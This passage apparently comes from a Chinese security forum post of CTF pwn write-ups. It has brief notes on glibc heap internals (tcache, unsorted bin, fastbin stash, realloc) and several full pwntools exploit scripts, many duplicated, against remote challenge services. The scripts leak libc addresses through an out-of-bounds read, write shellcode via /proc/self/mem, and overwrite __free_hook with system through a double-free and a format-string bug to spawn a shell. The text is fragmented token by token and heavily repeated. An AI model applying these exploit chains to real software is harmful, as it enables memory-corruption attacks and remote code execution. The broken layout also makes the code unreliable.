##sla("to ?\n>> ",str((elf.got['puts']-elf.sym['dist']/8)))
##libc_base=int(r.recvuntil("\n",drop=True),base=10)-libc.sym['puts']
r.recvuntil(
"path is "
)
libc_base
=
int
(r.recvuntil(
"\n"
, drop
=
True
), base
=
10
)
-
libc.sym[
"puts"
]
##log.success('libc_base:'+hex(libc_base))
##leak_proc
sla(
"nodes?\n>> "
,
str
(
1
))
sla(
"edges?\n>> "
,
str
(
0
))
sla(
"node?\n>> "
,
str
(
0
))
sla(
"to ?\n>> "
,
str
((
0x6d28
-
elf.sym[
'dist'
])
/
8
))
r.recvuntil(
"path is "
)
proc_base
=
int
(r.recvuntil(
"\n"
,drop
=
True
),base
=
10
)
-
0x12e0
##log.success('proc_base:'+hex(proc_base))
##leak_stack
sla(
"nodes?\n>> "
,
str
(
1
))
sla(
"edges?\n>> "
,
str
(
0
))
sla(
"node?\n>> "
,
str
(
0
))
##gdb.attach(r)
sla(
"to ?\n>> "
,
str
((libc_base
+
libc.sym[
'environ'
]
-
(elf.sym[
'dist'
]
+
proc_base))
/
8
))
r.recvuntil(
"path is "
)
stack_address
=
int
(r.recvuntil(
"\n"
,drop
=
True
),base
=
10
)
##log.success('stack_address:'+hex(stack_address))
ret_address
=
str
((stack_address
-
0x100
-
(proc_base
+
elf.sym[
'dist'
]))
/
8
)
sla(
"nodes?\n>> "
,
str
(
2
))
sla(
"edges?\n>> "
,
str
(
1
))
sla(
"format\n"
,
"0 "
+
ret_address
+
" "
+
str
(proc_base
+
0x16aa
))
sla(
"node?\n>> "
,
str
(
0
))
##gdb.attach(r)
sla(
"to ?\n>> "
,
str
(
0
))
r.interactive()
/
proc
/
self
/
mem是进程的内存内容,通过修改该文件相当于直接修改当前进程的内存。
/
proc
/
self
/
mem是进程的内存内容,通过修改该文件相当于直接修改当前进程的内存。
glibc在
2.26
版本之后就加入了tcache
bin
以提高进程的运行效率
相较于fastbin,它没有对size成员的检测机制
具体的内存空间和其它细节可以看收藏夹里的一篇博客
大体上就是进程分配空间和释放空间都会有限考虑tcache
bin
,其同一大小内存的上限是
7
个,所以如果需要使用unsorted
bin
进行uaf的话,需要事先填满tcache
bin
2.31
版本加入了tcache的key指针检测机制,俺还不会伪造,但是可以在fastbin中doublefree,然后利用stash机制进入tcache避开对size成员的检测
glibc在
2.26
版本之后就加入了tcache
bin
以提高进程的运行效率
相较于fastbin,它没有对size成员的检测机制
具体的内存空间和其它细节可以看收藏夹里的一篇博客
大体上就是进程分配空间和释放空间都会有限考虑tcache
bin
,其同一大小内存的上限是
7
个,所以如果需要使用unsorted
bin
进行uaf的话,需要事先填满tcache
bin
2.31
版本加入了tcache的key指针检测机制,俺还不会伪造,但是可以在fastbin中doublefree,然后利用stash机制进入tcache避开对size成员的检测
unsorted
bin
:当fastbin和tcache都满或者不符合进入要求时,会优先考虑放入unsorted
bin
。该
bin
是用双向链表实现的,且为FIFO
且表头和表尾必然有fd或bk指针指向main_arena,所以可以利用unsorted
bin
uaf leak出libc基地址
fastbin stash:当malloc调用fastbin chunk时,会检测tache是否为空,倘若为空,就会把fastbin中剩下的chunk移进tcache
unsorted
bin
:当fastbin和tcache都满或者不符合进入要求时,会优先考虑放入unsorted
bin
。该
bin
是用双向链表实现的,且为FIFO
且表头和表尾必然有fd或bk指针指向main_arena,所以可以利用unsorted
bin
uaf leak出libc基地址
fastbin stash:当malloc调用fastbin chunk时,会检测tache是否为空,倘若为空,就会把fastbin中剩下的chunk移进tcache
用来重新分配ptr指针指向的chunk
size如果增大,会把数据复制到新的地址,但有几率ptr指针的值不变
size如果减小,数据会被复制并且截取长度
realloc(ptr,
0
)相当于free(ptr)
用来重新分配ptr指针指向的chunk
size如果增大,会把数据复制到新的地址,但有几率ptr指针的值不变
size如果减小,数据会被复制并且截取长度
realloc(ptr,
0
)相当于free(ptr)
from
pwn
import
*
from
LibcSearcher
import
*
from
pwnlib.util.iters
import
mbruteforce
from
hashlib
import
sha256
context.log_level
=
'debug'
def
proof_of_work(sh):
sh.recvuntil(
" == "
)
cipher
=
sh.recvline().strip().decode(
"utf8"
)
proof
=
mbruteforce(
lambda
x: sha256((x).encode()).hexdigest()
=
=
cipher, string.ascii_letters
+
string.digits, length
=
4
, method
=
'fixed'
)
sh.sendlineafter(
"input your ????>"
, proof)
##r=process('./b')
r
=
remote(
'chuj.top'
,
51904
)
proof_of_work(r)
r.recvuntil(
'write: '
)
write
=
int
(r.recvuntil(
'\n'
,drop
=
True
),base
=
16
)
log.success(
'write:'
+
hex
(write))
libc
=
LibcSearcher(
'write'
,write)
libcbase
=
write
-
libc.dump(
'write'
)
log.success(
'libcbase:'
+
hex
(libcbase))
ms
=
libcbase
+
libc.dump(
'__libc_start_main'
)
log.success(
'ms:'
+
hex
(ms))
r.sendlineafter(
'>> '
,
'/proc/self/mem\x00'
)
r.sendlineafter(
'>> '
,
str
(ms))
payload
=
asm(shellcraft.sh()).rjust(
0x300
, asm(
'nop'
))
+
'\n'
r.sendafter(
">> "
, payload)
r.interactive()
from
pwn
import
*
from
LibcSearcher
import
*
from
pwnlib.util.iters
import
mbruteforce
from
hashlib
import
sha256
context.log_level
=
'debug'
def
proof_of_work(sh):
sh.recvuntil(
" == "
)
cipher
=
sh.recvline().strip().decode(
"utf8"
)
proof
=
mbruteforce(
lambda
x: sha256((x).encode()).hexdigest()
=
=
cipher, string.ascii_letters
+
string.digits, length
=
4
, method
=
'fixed'
)
sh.sendlineafter(
"input your ????>"
, proof)
##r=process('./b')
r
=
remote(
'chuj.top'
,
51904
)
proof_of_work(r)
r.recvuntil(
'write: '
)
write
=
int
(r.recvuntil(
'\n'
,drop
=
True
),base
=
16
)
log.success(
'write:'
+
hex
(write))
libc
=
LibcSearcher(
'write'
,write)
libcbase
=
write
-
libc.dump(
'write'
)
log.success(
'libcbase:'
+
hex
(libcbase))
ms
=
libcbase
+
libc.dump(
'__libc_start_main'
)
log.success(
'ms:'
+
hex
(ms))
r.sendlineafter(
'>> '
,
'/proc/self/mem\x00'
)
r.sendlineafter(
'>> '
,
str
(ms))
payload
=
asm(shellcraft.sh()).rjust(
0x300
, asm(
'nop'
))
+
'\n'
r.sendafter(
">> "
, payload)
r.interactive()
from
pwn
import
*
from
pwnlib.util.iters
import
mbruteforce
from
hashlib
import
sha256
context.log_level
=
'debug'
def
proof_of_work(sh):
##sh.recvuntil("XXXX+")
##suffix = sh.recvuntil(')').decode("utf8")[:-1]
##log.success(suffix)
sh.recvuntil(
" == "
)
cipher
=
sh.recvline().strip().decode(
"utf8"
)
proof
=
mbruteforce(
lambda
x: sha256((x).encode()).hexdigest()
=
=
cipher, string.ascii_letters
+
string.digits, length
=
4
, method
=
'fixed'
)
sh.sendlineafter(
"input your ????>"
, proof)
##r=process('./b')
r
=
remote(
'chuj.top'
,
51562
)
proof_of_work(r)
##r=process('./note')
libc
=
ELF(
'./libc-2.31.so'
)
def
cho(num):
r.recvuntil(
">> "
)
r.sendline(
str
(num))
def
add(
id
,si,con):
cho(
1
)
r.recvuntil(
">> "
)
r.send(
str
(
id
))
r.recvuntil(
">> "
)
r.send(
str
(si))
r.recvuntil(
">> "
)
r.send(con)
def
delet(
id
):
cho(
3
)
r.recvuntil(
">> "
)
r.send(
str
(
id
))
def
show(
id
):
cho(
2
)
r.recvuntil(
">> "
)
r.send(
str
(
id
))
##gdb.attach(r)
for
i
in
range
(
0
,
8
):
add(i,
0x100
,
'a'
)
for
i
in
range
(
1
,
8
):
delet(i)
delet(
0
)
##gdb.attach(r)
show(
0
)
libcbase
=
u64(r.recv(
6
).ljust(
8
,
'\x00'
))
-
0x1c4b2d
-
(libc.sym[
'__libc_start_main'
]
+
243
)
log.success(
'libcbase:'
+
hex
(libcbase))
log.success(
'free_hook:'
+
hex
(libcbase
+
libc.sym[
'__free_hook'
]))
##gdb.attach(r)
for
i
in
range
(
0
,
9
):
add(i,
0x60
,
"a"
*
0x60
)
##0,1 un 2~9
for
i
in
range
(
0
,
7
):
delet(i)
##gdb.attach(r)
##delet(9)
##delet(10)
delet(
7
)
delet(
8
)
delet(
7
)
for
i
in
range
(
0
,
7
):
add(i,
0x60
,
'a'
*
0x60
)
##gdb.attach(r)
add(
0
,
0x60
,p64(libcbase
+
libc.sym[
'__free_hook'
]))
add(
1
,
0x60
,
'a'
)
add(
2
,
0x60
,
'/bin/sh\x00'
)
add(
0
,
0x60
,p64(libcbase
+
libc.sym[
'system'
]))
delet(
2
)
r.interactive()
from
pwn
import
*
from
pwnlib.util.iters
import
mbruteforce
from
hashlib
import
sha256
context.log_level
=
'debug'
def
proof_of_work(sh):
##sh.recvuntil("XXXX+")
##suffix = sh.recvuntil(')').decode("utf8")[:-1]
##log.success(suffix)
sh.recvuntil(
" == "
)
cipher
=
sh.recvline().strip().decode(
"utf8"
)
proof
=
mbruteforce(
lambda
x: sha256((x).encode()).hexdigest()
=
=
cipher, string.ascii_letters
+
string.digits, length
=
4
, method
=
'fixed'
)
sh.sendlineafter(
"input your ????>"
, proof)
##r=process('./b')
r
=
remote(
'chuj.top'
,
51562
)
proof_of_work(r)
##r=process('./note')
libc
=
ELF(
'./libc-2.31.so'
)
def
cho(num):
r.recvuntil(
">> "
)
r.sendline(
str
(num))
def
add(
id
,si,con):
cho(
1
)
r.recvuntil(
">> "
)
r.send(
str
(
id
))
r.recvuntil(
">> "
)
r.send(
str
(si))
r.recvuntil(
">> "
)
r.send(con)
def
delet(
id
):
cho(
3
)
r.recvuntil(
">> "
)
r.send(
str
(
id
))
def
show(
id
):
cho(
2
)
r.recvuntil(
">> "
)
r.send(
str
(
id
))
##gdb.attach(r)
for
i
in
range
(
0
,
8
):
add(i,
0x100
,
'a'
)
for
i
in
range
(
1
,
8
):
delet(i)
delet(
0
)
##gdb.attach(r)
show(
0
)
libcbase
=
u64(r.recv(
6
).ljust(
8
,
'\x00'
))
-
0x1c4b2d
-
(libc.sym[
'__libc_start_main'
]
+
243
)
log.success(
'libcbase:'
+
hex
(libcbase))
log.success(
'free_hook:'
+
hex
(libcbase
+
libc.sym[
'__free_hook'
]))
##gdb.attach(r)
for
i
in
range
(
0
,
9
):
add(i,
0x60
,
"a"
*
0x60
)
##0,1 un 2~9
for
i
in
range
(
0
,
7
):
delet(i)
##gdb.attach(r)
##delet(9)
##delet(10)
delet(
7
)
delet(
8
)
delet(
7
)
for
i
in
range
(
0
,
7
):
add(i,
0x60
,
'a'
*
0x60
)
##gdb.attach(r)
add(
0
,
0x60
,p64(libcbase
+
libc.sym[
'__free_hook'
]))
add(
1
,
0x60
,
'a'
)
add(
2
,
0x60
,
'/bin/sh\x00'
)
add(
0
,
0x60
,p64(libcbase
+
libc.sym[
'system'
]))
delet(
2
)
r.interactive()
from
pwn
import
*
##from LibcSearcher import *
from
pwnlib.util.iters
import
mbruteforce
from
hashlib
import
sha256
##import base64
context.log_level
=
'debug'
##context.terminal = ["tmux", "splitw", "-h"]
context.arch
=
'amd64'
##context.os = 'linux'
def
proof_of_work(sh):
sh.recvuntil(
" == "
)
cipher
=
sh.recvline().strip().decode(
"utf8"
)
proof
=
mbruteforce(
lambda
x: sha256((x).encode()).hexdigest()
=
=
cipher, string.ascii_letters
+
string.digits, length
=
4
, method
=
'fixed'
)
sh.sendlineafter(
"input your ????>"
, proof)
r
=
remote(
"chuj.top"
,
52156
)
proof_of_work(r)
##r=process('./echo')
libc
=
ELF(
'./libc-2.31.so'
)
r.recvuntil(
">> "
)
payload
=
"%6$p--%13$p\n"
r.sendline(
str
(
len
(payload)))
r.send(payload)
##leak
rbp
=
int
(r.recvuntil(
'--'
,drop
=
True
),base
=
16
)
libcbase
=
int
(r.recvuntil(
'\n'
,drop
=
True
),base
=
16
)
-
(libc.sym[
'__libc_start_main'
]
+
243
)
free_hook
=
libcbase
+
libc.sym[
"__free_hook"
]
system
=
libcbase
+
libc.sym[
'system'
]
log.success(
'free_hook:'
+
hex
(free_hook))
log.success(
'rbp:'
+
hex
(rbp))
log.success(
'libcbase:'
+
hex
(libcbase))
log.success(
'system:'
+
hex
(system))
sm_of
=
(rbp &
0xff
)
+
0x18
log.success(
'sm_of:'
+
hex
(sm_of))
##add hook
payload
=
"%{}c%6$hhn\n"
.
format
(sm_of)
r.recvuntil(
"length:\n>> "
)
r.sendline(
str
(
len
(payload)))
r.send(payload)
payload
=
"%{}c%10$hn\n"
.
format
((free_hook) &
0xFFFF
)
r.recvuntil(
"length:\n>> "
)
r.sendline(
str
(
len
(payload)))
r.send(payload)
payload
=
"%{}c%6$hhn\n"
.
format
(sm_of
+
2
)
r.recvuntil(
"length:\n>> "
)
r.sendline(
str
(
len
(payload)))
r.send(payload)
payload
=
"%{}c%10$hn\n"
.
format
((free_hook>>
16
) &
0xFFFF
)
r.recvuntil(
"length:\n>> "
)
r.sendline(
str
(
len
(payload)))
r.send(payload)
payload
=
"%{}c%6$hhn\n"
.
format
(sm_of
+
4
)
r.recvuntil(
"length:\n>> "
)
r.sendline(
str
(
len
(payload)))
r.send(payload)
payload
=
"%{}c%10$hn\n"
.
format
((free_hook>>
32
) &
0xFFFF
)
r.recvuntil(
"length:\n>> "
)
r.sendline(
str
(
len
(payload)))
##gdb.attach(r)
r.send(payload)
##remake
payload
=
"%{}c%6$hhn\n"
.
format
(sm_of)
r.recvuntil(
"length:\n>> "
)
r.sendline(
str
(
len
(payload)))
r.send(payload)
##change hook
payload
=
"%{}c%10$hn\n"
.
format
(free_hook &
0xFFFF
)
r.recvuntil(
"length:\n>> "
)
r.sendline(
str
(
len
(payload)))
r.send(payload)
payload
=
"%{}c%13$hn\n"
.
format
((system) &
0xFFFF
)
r.recvuntil(
"length:\n>> "
)
r.sendline(
str
(
len
(payload)))
r.send(payload)
payload
=
"%{}c%10$hn\n"
.
format
((free_hook
+
2
) &
0xFFFF
)
r.recvuntil(
"length:\n>> "
)
r.sendline(
str
(
len
(payload)))
r.send(payload)
payload
=
"%{}c%13$hn\n"
.
format
((system>>
16
) &
0xFFFF
)
r.recvuntil(
"length:\n>> "
)
r.sendline(
str
(
len
(payload)))
r.send(payload)
payload
=
"%{}c%10$hn\n"
.
format
((free_hook
+
4
) &
0xFFFF
)
r.recvuntil(
"length:\n>> "
)
r.sendline(
str
(
len
(payload)))
r.send(payload)
payload
=
"%{}c%13$hn\n"
.
format
((system>>
32
) &
0xFFFF
)
r.recvuntil(
"length:\n>> "
)
r.sendline(
str
(
len
(payload)))
##gdb.attach(r)
r.send(payload)
##call system
payload
=
"/bin/sh\x00"
r.recvuntil(
"length:\n>> "
)
r.sendline(
str
(
len
(payload)))
r.send(payload)
r.recvuntil(
"length:\n>> "
)
r.sendline(
str
(
0
))
r.interactive()
from
pwn
import
*
##from LibcSearcher import *
from
pwnlib.util.iters
import
mbruteforce
from
hashlib
import
sha256
##import base64
context.log_level
=
'debug'
##context.terminal = ["tmux", "splitw", "-h"]
context.arch
=
'amd64'
##context.os = 'linux'
def
proof_of_work(sh):
sh.recvuntil(
" == "
)
cipher
=
sh.recvline().strip().decode(
"utf8"
)
proof
=
mbruteforce(
lambda
x: sha256((x).encode()).hexdigest()
=
=
cipher, string.ascii_letters
+
string.digits, length
=
4
, method
=
'fixed'
)
sh.sendlineafter(
"input your ????>"
, proof)
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
赞赏
- 西湖论剑2024 IOT赛后复盘及mqtt rce详解 13831
- 对某嵌入式设备声波配网的研究 11920
- DAS10月月赛PWN出题心路&&CVE-2023-40930的介绍 11355
- [原创]关于Nokelock蓝牙锁破解分析 21861
- [原创]基于树莓派的蓝牙调试环境搭建 24487